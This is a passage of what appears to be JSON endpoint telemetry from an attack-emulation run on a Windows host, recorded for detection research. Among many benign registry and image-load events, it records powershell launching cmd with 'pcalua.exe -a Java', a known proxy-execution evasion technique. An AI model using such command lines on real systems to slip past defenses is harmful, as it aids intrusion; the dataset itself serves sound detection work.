"HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a Java\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7060, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574007730000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "file", + "file_name": "PCALUA.EXE-5EB8CBC1.pf", + "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "command_line": "pcalua.exe -a Java", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5020, + "ppid": 7060, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "create", + "timestamp": 131883574007840000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}", + "unique_ppid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "pcalua.exe", + "image_path": "C:\\Windows\\System32\\pcalua.exe", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "pcaui.dll", + "image_path": "C:\\Windows\\System32\\pcaui.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "dui70.dll", + "image_path": "C:\\Windows\\System32\\dui70.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "wer.dll", + "image_path": "C:\\Windows\\System32\\wer.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_value": "W32:000000000008056A", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ndfapi.dll", + "image_path": "C:\\Windows\\System32\\ndfapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "wdi.dll", + "image_path": "C:\\Windows\\System32\\wdi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + 